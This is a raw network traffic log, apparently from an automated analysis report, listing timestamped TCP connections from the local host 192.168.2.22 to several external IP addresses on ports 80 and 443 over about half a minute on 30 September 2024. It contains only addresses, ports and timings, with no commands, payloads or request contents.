                                                                                  Sep 30, 2024 10:12:32.334970951 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334981918 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334991932 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335001945 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335005999 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335014105 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335014105 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335031033 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335031986 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335041046 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335045099 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335059881 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335062981 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335069895 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335071087 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335093021 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335103035 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335136890 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335146904 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335156918 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335167885 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335176945 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335179090 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335189104 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335191011 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335200071 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335210085 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335218906 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335227013 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335231066 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335233927 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335239887 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335242987 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335264921 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335275888 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335328102 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335354090 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335364103 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335372925 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335392952 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335400105 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335406065 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335407019 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335414886 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335426092 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335427046 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335452080 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335472107 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335488081 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335499048 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335509062 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335514069 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335514069 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335514069 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335514069 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335520029 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335530043 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335530996 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335540056 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335545063 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335551023 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335556984 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335561991 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335572004 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335576057 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335582018 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335582972 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335601091 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335608006 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335642099 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:36.437736034 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:36.438432932 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:39.922867060 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:39.922905922 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:39.922966003 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:39.923556089 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:39.923572063 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:40.391961098 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:40.392067909 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:40.400432110 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:40.400439978 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:40.405565977 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:40.405571938 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:40.889161110 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:41.211750984 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.211826086 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.211925030 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:41.258064032 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:41.258089066 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.968570948 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.968614101 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.968678951 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.969811916 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.969820023 CEST44349170104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.969862938 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.974513054 CEST4917180192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:41.979367971 CEST8049171172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.979449034 CEST4917180192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:41.993644953 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.993669033 CEST44349170104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.994004011 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.994016886 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.449218988 CEST44349170104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.449327946 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.484076977 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.484241962 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.523631096 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.523672104 CEST44349170104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.524049044 CEST44349170104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.524302006 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.529635906 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.529664993 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.530010939 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.530055046 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.659636974 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.707634926 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.445547104 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.445638895 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.445638895 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:43.445792913 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:43.544266939 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:43.544307947 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.681503057 CEST4917180192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:43.682862043 CEST4917280192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:43.687011957 CEST8049171172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.687078953 CEST4917180192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:43.687709093 CEST8049172172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.687781096 CEST4917280192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:43.793008089 CEST4917280192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:43.797995090 CEST8049172172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:44.169147968 CEST8049172172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:44.169207096 CEST4917280192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:46.647516012 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:46.652419090 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:46.652477980 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:46.688663006 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:46.693497896 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.158879042 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.368921995 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.369044065 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:47.789362907 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:47.794271946 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.902633905 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.996093988 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:47.996193886 CEST44349174188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.996262074 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:48.006556034 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:48.006583929 CEST44349174188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:48.103213072 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:48.473948002 CEST44349174188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:48.474091053 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:48.494441032 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:48.494487047 CEST44349174188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:48.494906902 CEST44349174188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:48.699408054 CEST44349174188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:48.700831890 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:49.052844048 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:49.095406055 CEST44349174188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:49.171065092 CEST8049172172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:49.171140909 CEST4917280192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:49.273730993 CEST44349174188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:49.273835897 CEST44349174188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:49.273919106 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:49.287137985 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:49.368849993 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:49.373807907 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:49.472323895 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:49.501152992 CEST49175443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:49.501266003 CEST44349175188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:49.501343966 CEST49175443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:49.501802921 CEST49175443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:49.501838923 CEST44349175188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:49.716661930 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:49.716717005 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:49.953341007 CEST44349175188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:50.016180992 CEST49175443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:50.016218901 CEST44349175188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:50.120570898 CEST44349175188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:50.120655060 CEST44349175188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:50.120712042 CEST49175443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:50.121308088 CEST49175443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:50.155751944 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:50.161129951 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:50.161190033 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:50.197191954 CEST4917680192.168.2.22132.226.8.169
                                                                                  Sep 30, 2024 10:12:50.202039003 CEST8049176132.226.8.169192.168.2.22
                                                                                  Sep 30, 2024 10:12:50.202095032 CEST4917680192.168.2.22132.226.8.169
                                                                                  Sep 30, 2024 10:12:50.202388048 CEST4917680192.168.2.22132.226.8.169
                                                                                  Sep 30, 2024 10:12:50.207144022 CEST8049176132.226.8.169192.168.2.22
                                                                                  Sep 30, 2024 10:12:50.337584019 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:50.337651014 CEST4917280192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:51.348546028 CEST8049176132.226.8.169192.168.2.22
                                                                                  Sep 30, 2024 10:12:51.378335953 CEST49177443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:51.378367901 CEST44349177188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:51.378447056 CEST49177443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:51.378778934 CEST49177443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:51.378799915 CEST44349177188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:51.550828934 CEST4917680192.168.2.22132.226.8.169
                                                                                  Sep 30, 2024 10:12:51.832267046 CEST44349177188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:51.835062027 CEST49177443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:51.835094929 CEST44349177188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:51.978954077 CEST44349177188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:51.979042053 CEST44349177188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:51.979099989 CEST49177443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:51.979660034 CEST49177443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:51.992232084 CEST4917680192.168.2.22132.226.8.169
                                                                                  Sep 30, 2024 10:12:51.997257948 CEST8049176132.226.8.169192.168.2.22
                                                                                  Sep 30, 2024 10:12:51.997328043 CEST4917680192.168.2.22132.226.8.169
                                                                                  Sep 30, 2024 10:12:52.013253927 CEST4917880192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:12:52.019288063 CEST8049178132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:12:52.019367933 CEST4917880192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:12:52.019423008 CEST4917880192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:12:52.025636911 CEST8049178132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:12:52.694926977 CEST8049178132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:12:52.792279005 CEST49179443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:12:52.792339087 CEST44349179188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:52.792395115 CEST49179443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:12:52.798896074 CEST49179443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:12:52.798909903 CEST44349179188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:52.904678106 CEST8049178132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:12:52.906975031 CEST4917880192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:12:53.254739046 CEST44349179188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:53.257800102 CEST49179443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:12:53.257833958 CEST44349179188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:53.392232895 CEST44349179188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:53.392328978 CEST44349179188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:53.392370939 CEST49179443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:12:53.393690109 CEST49179443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:12:53.447212934 CEST4918080192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:53.452102900 CEST8049180193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:53.452157974 CEST4918080192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:53.454821110 CEST4918080192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:53.459667921 CEST8049180193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:53.906809092 CEST8049180193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:54.120743990 CEST8049180193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:54.120852947 CEST4918080192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:54.245179892 CEST49181443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:54.245217085 CEST44349181188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:54.245280027 CEST49181443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:54.282215118 CEST49181443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:54.282231092 CEST44349181188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:54.742413998 CEST44349181188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:54.745299101 CEST49181443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:54.745326042 CEST44349181188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:54.888554096 CEST44349181188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:54.888670921 CEST44349181188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:54.888721943 CEST49181443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:54.889185905 CEST49181443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:55.006558895 CEST4918080192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:55.011856079 CEST8049180193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:55.011907101 CEST4918080192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:55.057737112 CEST4918280192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:55.062541008 CEST8049182193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:12:55.063009977 CEST4918280192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:55.063009977 CEST4918280192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:55.068294048 CEST8049182193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:12:55.697236061 CEST8049182193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:12:55.908642054 CEST8049182193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:12:55.910902023 CEST4918280192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:56.036108017 CEST49183443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:56.036151886 CEST44349183188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:56.036207914 CEST49183443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:56.036520004 CEST49183443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:56.036535025 CEST44349183188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:56.495873928 CEST44349183188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:56.537791967 CEST49183443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:56.537808895 CEST44349183188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:56.647825956 CEST44349183188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:56.647906065 CEST44349183188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:56.647963047 CEST49183443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:56.695027113 CEST49183443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:56.896401882 CEST4918280192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:56.901529074 CEST8049182193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:12:56.901599884 CEST4918280192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:57.097346067 CEST4918480192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:57.102191925 CEST8049184193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:12:57.102263927 CEST4918480192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:57.102463007 CEST4918480192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:57.107254028 CEST8049184193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:12:57.759094000 CEST8049184193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:12:57.789786100 CEST49185443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:57.789848089 CEST44349185188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:57.789906025 CEST49185443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:57.790230036 CEST49185443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:57.790246010 CEST44349185188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:57.968663931 CEST8049184193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:12:57.968722105 CEST4918480192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:58.244087934 CEST44349185188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:58.247524023 CEST49185443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:58.247560024 CEST44349185188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:58.371103048 CEST44349185188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:58.371190071 CEST44349185188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:58.371273994 CEST49185443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:58.372282982 CEST49185443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:58.384804010 CEST4918480192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:58.390827894 CEST8049184193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:12:58.390882969 CEST4918480192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:58.413234949 CEST4918680192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:12:58.418066025 CEST8049186158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:12:58.420845985 CEST4918680192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:12:58.420878887 CEST4918680192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:12:58.425683022 CEST8049186158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:12:59.882663965 CEST4918780192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:59.887670040 CEST8049187193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:12:59.887742043 CEST4918780192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:59.888009071 CEST4918780192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:12:59.892792940 CEST8049187193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.417362928 CEST8049186158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.440599918 CEST49188443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:00.440673113 CEST44349188188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.440749884 CEST49188443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:00.441160917 CEST49188443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:00.441207886 CEST44349188188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.544815063 CEST8049187193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.574348927 CEST4918780192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:13:00.579241991 CEST8049187193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.600786924 CEST8049186158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.604856014 CEST4918680192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:00.762027025 CEST8049187193.122.6.168192.168.2.22
